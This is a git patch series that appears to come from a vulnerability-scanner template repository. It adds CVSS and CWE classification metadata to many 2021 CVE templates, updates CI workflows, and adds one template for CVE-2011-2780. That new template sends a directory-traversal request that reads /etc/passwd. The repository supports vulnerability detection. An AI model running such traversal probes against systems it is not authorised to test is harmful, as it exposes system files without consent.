cvss-score: 6.50 + cve-id: CVE-2021-31249 requests: - method: GET diff --git a/cves/2021/CVE-2021-31250.yaml b/cves/2021/CVE-2021-31250.yaml index f03536d032..da104e45c7 100644 --- a/cves/2021/CVE-2021-31250.yaml +++ b/cves/2021/CVE-2021-31250.yaml @@ -7,6 +7,11 @@ info: reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250 severity: medium tags: cve,cve2021,chiyu,xss,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2021-31250 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 8a0135ebcb..30d25808bb 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -9,6 +9,10 @@ info: - https://www.ambionics.io/blog/laravel-debug-rce - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129 tags: cve,cve2021,laravel,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-3129 requests: - raw: diff --git a/cves/2021/CVE-2021-31537.yaml b/cves/2021/CVE-2021-31537.yaml index 0e40527eea..10abaf9ffe 100644 --- a/cves/2021/CVE-2021-31537.yaml +++ b/cves/2021/CVE-2021-31537.yaml @@ -7,6 +7,11 @@ info: reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/ severity: medium tags: cve,cve2021,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-31537 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-31581.yaml b/cves/2021/CVE-2021-31581.yaml index 4239a6763e..9da45f7140 100644 --- a/cves/2021/CVE-2021-31581.yaml +++ b/cves/2021/CVE-2021-31581.yaml @@ -8,6 +8,12 @@ info: - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/ severity: medium tags: cve,cve2021,akkadian,mariadb,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.40 + cve-id: CVE-2021-31581 + cwe-id: CWE-312 + description: "The restricted shell provided by Akkadian Provisioning Manager Engine (PME) can be escaped by abusing the 'Edit MySQL Configuration' command. This command launches a standard vi editor interface which can then be escaped. This issue was resolved in Akkadian OVA appliance version 3.0 (and later), Akkadian Provisioning Manager 5.0.2 (and later), and Akkadian Appliance Manager 3.3.0.314-4a349e0 (and later)." requests: - method: GET diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml index 71be85cd28..66ef428473 100644 --- a/cves/2021/CVE-2021-31755.yaml +++ b/cves/2021/CVE-2021-31755.yaml @@ -9,6 +9,11 @@ info: - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3 - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai tags: cve,cve2021,tenda,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-31755 + cwe-id: CWE-787 requests: - raw: diff --git a/cves/2021/CVE-2021-31856.yaml b/cves/2021/CVE-2021-31856.yaml index deb18ee2f2..86cd3cb7a1 100644 --- a/cves/2021/CVE-2021-31856.yaml +++ b/cves/2021/CVE-2021-31856.yaml @@ -9,6 +9,11 @@ info: - https://github.com/ssst0n3/CVE-2021-31856 - https://nvd.nist.gov/vuln/detail/CVE-2021-31856 tags: sqli,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-31856 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2021/CVE-2021-32030.yaml b/cves/2021/CVE-2021-32030.yaml index 47b367c664..5918a5c871 100644 --- a/cves/2021/CVE-2021-32030.yaml +++ b/cves/2021/CVE-2021-32030.yaml @@ -3,10 +3,15 @@ id: CVE-2021-32030 info: name: ASUS GT-AC2900 - Authentication Bypass author: gy741 - severity: high + severity: critical description: The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations. reference: https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass tags: cve,cve2021,asus,auth-bypass,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-32030 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2021/CVE-2021-3223.yaml b/cves/2021/CVE-2021-3223.yaml index 801dd5b095..31a095515f 100644 --- a/cves/2021/CVE-2021-3223.yaml +++ b/cves/2021/CVE-2021-3223.yaml @@ -9,6 +9,11 @@ info: - https://github.com/node-red/node-red-dashboard/issues/669 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223 tags: cve,cve2020,node-red-dashboard,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-3223 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-32305.yaml b/cves/2021/CVE-2021-32305.yaml index 70f2fb7787..c85b8eac3a 100644 --- a/cves/2021/CVE-2021-32305.yaml +++ b/cves/2021/CVE-2021-32305.yaml @@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-32305 - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html tags: cve,cve2021,websvn,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-32305 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-32819.yaml b/cves/2021/CVE-2021-32819.yaml index 3b08cefdd4..455e65993d 100644 --- a/cves/2021/CVE-2021-32819.yaml +++ b/cves/2021/CVE-2021-32819.yaml @@ -3,7 +3,7 @@ id: CVE-2021-32819 info: name: Nodejs squirrelly template engine RCE author: pikpikcu - severity: critical + severity: high description: | Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is @@ -13,6 +13,10 @@ info: - https://www.linuxlz.com/aqld/2331.html - https://blog.diefunction.io/vulnerabilities/ghsl-2021-023 tags: cve,cve2021,nodejs,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-32819 requests: - method: GET diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml index 3c91c1e2a2..99daa3b409 100644 --- a/cves/2021/CVE-2021-32820.yaml +++ b/cves/2021/CVE-2021-32820.yaml @@ -3,11 +3,17 @@ id: CVE-2021-32820 info: name: Express-handlebars Path Traversal author: dhiyaneshDk - severity: medium + severity: high reference: - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json tags: cve,cve2021,expressjs,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.60 + cve-id: CVE-2021-32820 + cwe-id: CWE-200 + description: "Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extentions (i.e. file.extension) can be included, files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability." requests: - method: GET diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml index ae2f69e33a..801f92c40d 100644 --- a/cves/2021/CVE-2021-3297.yaml +++ b/cves/2021/CVE-2021-3297.yaml @@ -8,6 +8,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-3297 - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass tags: cve,cve2021,zyxel,auth-bypass,router + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.80 + cve-id: CVE-2021-3297 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2021/CVE-2021-33221.yaml b/cves/2021/CVE-2021-33221.yaml index b64016ff6a..9b713950a9 100644 --- a/cves/2021/CVE-2021-33221.yaml +++ b/cves/2021/CVE-2021-33221.yaml @@ -5,8 +5,13 @@ info: author: geeknik description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf - severity: medium + severity: critical tags: cve,cve2021,commscope,ruckus,debug + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-33221 + cwe-id: CWE-306 requests: - method: GET diff --git a/cves/2021/CVE-2021-33564.yaml b/cves/2021/CVE-2021-33564.yaml index a2bbd5d431..b6b1e0781e 100644 --- a/cves/2021/CVE-2021-33564.yaml +++ b/cves/2021/CVE-2021-33564.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/ tags: cve,cve2021,rce,ruby + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-33564 + cwe-id: CWE-88 + description: "An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility." requests: - method: GET diff --git a/cves/2021/CVE-2021-3374.yaml b/cves/2021/CVE-2021-3374.yaml index a337b419ae..8446f3f830 100644 --- a/cves/2021/CVE-2021-3374.yaml +++ b/cves/2021/CVE-2021-3374.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/colemanjp/rstudio-shiny-server-directory-traversal-source-code-leak severity: medium tags: cve,cve2021,rstudio,traversal + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-3374 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml index 1b44686e3e..58c38c5802 100644 --- a/cves/2021/CVE-2021-3377.yaml +++ b/cves/2021/CVE-2021-3377.yaml @@ -9,6 +9,11 @@ info: author: geeknik severity: medium tags: cve,cve2021,xss,npm + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-3377 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml index f39c826555..80215a832b 100644 --- a/cves/2021/CVE-2021-3378.yaml +++ b/cves/2021/CVE-2021-3378.yaml @@ -10,6 +10,11 @@ info: via insecure POST request. It has been tested on version 4.4.2.2 in Windows 10 Enterprise. tags: cve,cve2021,fortilogger,fortigate,fortinet + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-3378 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2021/CVE-2021-33807.yaml b/cves/2021/CVE-2021-33807.yaml index 7ffb782090..4cee9b0a73 100644 --- a/cves/2021/CVE-2021-33807.yaml +++ b/cves/2021/CVE-2021-33807.yaml @@ -9,6 +9,11 @@ info: - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807 tags: cve,cve2021,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-33807 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-33904.yaml b/cves/2021/CVE-2021-33904.yaml index cdb7130cd7..1e62c84265 100644 --- a/cves/2021/CVE-2021-33904.yaml +++ b/cves/2021/CVE-2021-33904.yaml @@ -7,6 +7,11 @@ info: reference: https://www.exploit-db.com/exploits/49980 severity: medium tags: cve,cve2021,accela,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-33904 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-34370.yaml b/cves/2021/CVE-2021-34370.yaml index a920b1c540..0e34c5c406 100644 --- a/cves/2021/CVE-2021-34370.yaml +++ b/cves/2021/CVE-2021-34370.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-34370 - https://www.accela.com/civic-platform/ tags: xss,redirect,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-34370 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-34429.yaml b/cves/2021/CVE-2021-34429.yaml index 726f1cffae..fa1c651a3a 100644 --- a/cves/2021/CVE-2021-34429.yaml +++ b/cves/2021/CVE-2021-34429.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm tags: cve,cve2021,jetty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-34429 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml index 5a10ae6168..68a4fd2b38 100644 --- a/cves/2021/CVE-2021-34473.yaml +++ b/cves/2021/CVE-2021-34473.yaml @@ -11,6 +11,10 @@ info: - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 tags: cve,cve2021,ssrf,rce,exchange + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-34473 requests: - method: GET diff --git a/cves/2021/CVE-2021-34621.yaml b/cves/2021/CVE-2021-34621.yaml index 9a97a4f4e5..4362823530 100644 --- a/cves/2021/CVE-2021-34621.yaml +++ b/cves/2021/CVE-2021-34621.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin tags: cve,cve2021,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-34621 + cwe-id: CWE-269 + description: "A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3. ." requests: - raw: diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml index f3e3f41ee9..a7800fd3ac 100644 --- a/cves/2021/CVE-2021-35464.yaml +++ b/cves/2021/CVE-2021-35464.yaml @@ -12,6 +12,11 @@ info: tags: cve,cve2021,openam,rce,java reference: - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-35464 + cwe-id: CWE-502 requests: - method: GET diff --git a/cves/2021/CVE-2021-36380.yaml b/cves/2021/CVE-2021-36380.yaml index 7030f465af..afdeff9e10 100644 --- a/cves/2021/CVE-2021-36380.yaml +++ b/cves/2021/CVE-2021-36380.yaml @@ -8,6 +8,11 @@ info: reference: - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/ tags: cve,cve2021,sureline,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-36380 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-37216.yaml b/cves/2021/CVE-2021-37216.yaml index 33de2b4095..de96cad6d0 100644 --- a/cves/2021/CVE-2021-37216.yaml +++ b/cves/2021/CVE-2021-37216.yaml @@ -10,6 +10,11 @@ info: reference: https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html severity: medium tags: cve,cve2021,xss,qsan + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-37216 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-37538.yaml b/cves/2021/CVE-2021-37538.yaml index 758e66491c..c7327b670e 100644 --- a/cves/2021/CVE-2021-37538.yaml +++ b/cves/2021/CVE-2021-37538.yaml @@ -3,12 +3,17 @@ id: CVE-2021-37538 info: name: PrestaShop SmartBlog SQL Injection author: whoever - severity: high + severity: critical description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality. tags: cve,cve2021,prestashop,smartblog,sqli reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538 - https://blog.sorcery.ie/posts/smartblog_sqli/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-37538 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml index 6c9c42fe15..aa50dba941 100644 --- a/cves/2021/CVE-2021-37573.yaml +++ b/cves/2021/CVE-2021-37573.yaml @@ -7,6 +7,12 @@ info: reference: - https://seclists.org/fulldisclosure/2021/Aug/13 tags: cve,cve2021,xss,tjws + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-37573 + cwe-id: CWE-79 + description: "A reflected cross-site scripting (XSS) vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page" requests: - method: GET diff --git a/cves/2021/CVE-2021-37704.yaml b/cves/2021/CVE-2021-37704.yaml index f9424b16b2..cefb540971 100644 --- a/cves/2021/CVE-2021-37704.yaml +++ b/cves/2021/CVE-2021-37704.yaml @@ -3,12 +3,17 @@ id: CVE-2021-37704 info: name: phpfastcache phpinfo exposure author: whoever - severity: low + severity: medium description: phpinfo() exposure in unprotected composer vendor folder via phpfastcache/phpfastcache. tags: cve,cve2021,exposure,phpfastcache reference: https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2021-37704 + cwe-id: CWE-668 requests: - method: GET diff --git a/cves/2021/CVE-2021-38702.yaml b/cves/2021/CVE-2021-38702.yaml index c17a52845f..cf51a9d3b3 100644 --- a/cves/2021/CVE-2021-38702.yaml +++ b/cves/2021/CVE-2021-38702.yaml @@ -7,6 +7,11 @@ info: description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php. reference: https://seclists.org/fulldisclosure/2021/Aug/20 tags: cve,cve2021,cyberoam,netgenie,xss,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-38702 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-38751.yaml b/cves/2021/CVE-2021-38751.yaml index 209200dcb3..f65c7095ad 100644 --- a/cves/2021/CVE-2021-38751.yaml +++ b/cves/2021/CVE-2021-38751.yaml @@ -13,6 +13,11 @@ info: - https://github.com/exponentcms/exponent-cms/issues/1544 - https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64 tags: cve,cve2021,exponentcms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.30 + cve-id: CVE-2021-38751 + cwe-id: CWE-116 requests: - method: GET From 8b31e0d006d16296c987f5aa05632bcc2c9dd56c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 17:41:35 +0530 Subject: [PATCH 2121/4083] Added CVE Annotation workflow --- .github/workflows/cve-annotate.yaml | 45 +++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 .github/workflows/cve-annotate.yaml diff --git a/.github/workflows/cve-annotate.yaml b/.github/workflows/cve-annotate.yaml new file mode 100644 index 0000000000..d29ea24563 --- /dev/null +++ b/.github/workflows/cve-annotate.yaml @@ -0,0 +1,45 @@ +name: ✍🏻 CVE Annotate + +on: + pull_request: + branches: + - master + workflow_dispatch: + +jobs: + docs: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@master + with: + persist-credentials: false + fetch-depth: 0 + token: ${{ secrets.GITHUB_TOKEN }} + + - uses: actions/setup-go@v2 + with: + go-version: 1.17 + + - name: Generate CVE Annotations + id: cve-annotate + run: | + if ! which cve-annotate > /dev/null; then + echo -e "Command cve-annotate not found! Installing\c" + go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev + fi + cve-annotate -i ./cves/ -d . + echo "::set-output name=changes::$(git status -s | wc -l)" + + - name: Commit files + if: steps.cve-annotate.outputs.changes > 0 + run: | + git config --local user.email "action@github.com" + git config --local user.name "GitHub Action" + git add cves + git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a + + - name: Push changes + if: steps.cve-annotate.outputs.changes > 0 + uses: ad-m/github-push-action@master + with: + github_token: ${{ secrets.GITHUB_TOKEN }} From 68abf454eb163a21324cf0e914fb011e323fd226 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 17:47:08 +0530 Subject: [PATCH 2122/4083] misc update --- .github/workflows/template-validate.yml | 13 +++++-------- .github/workflows/templates-stats.yml | 17 +++++------------ 2 files changed, 10 insertions(+), 20 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index d0d3ede28e..95e3f9a597 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -6,13 +6,10 @@ jobs: build: runs-on: ubuntu-latest steps: - - name: Checkout Repo - uses: actions/checkout@master - - - name: Setup golang - uses: actions/setup-go@v2 - with: - go-version: 1.14 + - uses: actions/checkout@master + - uses: actions/setup-go@v2 + with: + go-version: 1.17 #- name: Cache Go # id: cache-go @@ -26,7 +23,7 @@ jobs: env: GO111MODULE: on run: | - go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei + go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev shell: bash - name: Template Validation diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 3fbb305a96..db02a5df05 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -11,21 +11,14 @@ jobs: runs-on: ubuntu-latest if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master' steps: - - name: Checkout Repo - uses: actions/checkout@master - with: - fetch-depth: 0 - - - name: Setup golang - uses: actions/setup-go@v2 - with: - go-version: 1.14 + - uses: actions/checkout@master + - uses: actions/setup-go@v2 + with: + go-version: 1.17 - name: Installing Template Stats - env: - GO111MODULE: on run: | - go get -v github.com/projectdiscovery/templates-stats@main + go install github.com/projectdiscovery/templates-stats@main shell: bash - name: Markdown Stats From a9d3acdd3d70efdf02f60e9f30e7482e87e0ac36 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 17:48:49 +0530 Subject: [PATCH 2123/4083] Update cve-annotate.yaml --- .github/workflows/cve-annotate.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/cve-annotate.yaml b/.github/workflows/cve-annotate.yaml index d29ea24563..bb66805d9f 100644 --- a/.github/workflows/cve-annotate.yaml +++ b/.github/workflows/cve-annotate.yaml @@ -15,9 +15,9 @@ jobs: persist-credentials: false fetch-depth: 0 token: ${{ secrets.GITHUB_TOKEN }} - + - uses: actions/setup-go@v2 - with: + with: go-version: 1.17 - name: Generate CVE Annotations From cde816535ae6d9b4acab9470008663762ae9912c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 17:50:25 +0530 Subject: [PATCH 2124/4083] misc update --- .github/workflows/{cve-annotate.yaml => cve-annotate.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename .github/workflows/{cve-annotate.yaml => cve-annotate.yml} (100%) diff --git a/.github/workflows/cve-annotate.yaml b/.github/workflows/cve-annotate.yml similarity index 100% rename from .github/workflows/cve-annotate.yaml rename to .github/workflows/cve-annotate.yml From 38c66ed681285b478d81fb6dc29f0337b90e9a37 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 10 Sep 2021 20:27:44 +0700 Subject: [PATCH 2125/4083] Create CVE-2011-2780.yaml --- cves/2011/CVE-2011-2780.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2011/CVE-2011-2780.yaml diff --git a/cves/2011/CVE-2011-2780.yaml b/cves/2011/CVE-2011-2780.yaml new file mode 100644 index 0000000000..db72d7955c --- /dev/null +++ b/cves/2011/CVE-2011-2780.yaml @@ -0,0 +1,31 @@ +id: CVE-2011-2780 + +info: + name: Chyrp 2.x - Local File Inclusion (LFI) + author: daffainfo + severity: high + description: Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/35946 + - https://www.cvedetails.com/cve/CVE-2011-2780 + tags: cve,cve2011,lfi + classification: + cvss-score: 5.0 + cve-id: CVE-2011-2780 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 9d6dab87a8b66f1c3239d8274296224f15b72912 Mon Sep 17 00:00:00 2001 From: Jackson Rolf <jrolf@paloaltonetworks.com> Date: Fri, 10 Sep 2021 11:38:38 -0400 Subject: [PATCH 2126/4083] test --- text.txt | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 text.txt diff --git a/text.txt b/text.txt new file mode 100644 index 0000000000..e69de29bb2 From 63eabba7583529c769af4a711c4350c1d6aac832 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 22:51:07 +0530 Subject: [PATCH 2127/4083] Update cve-annotate.yml --- .github/workflows/cve-annotate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index bb66805d9f..754b772885 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml @@ -25,7 +25,7 @@ jobs: run: | if ! which cve-annotate > /dev/null; then echo -e "Command cve-annotate not found! Installing\c" - go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev + go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@master fi cve-annotate -i ./cves/ -d . echo "::set-output name=changes::$(git status -s | wc -l)" From e4c3490a28f1b8674b57557b3ca6481456dddc86 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 22:51:33 +0530 Subject: [PATCH 2128/4083] Update template-validate.yml --- .github/workflows/template-validate.yml | 2 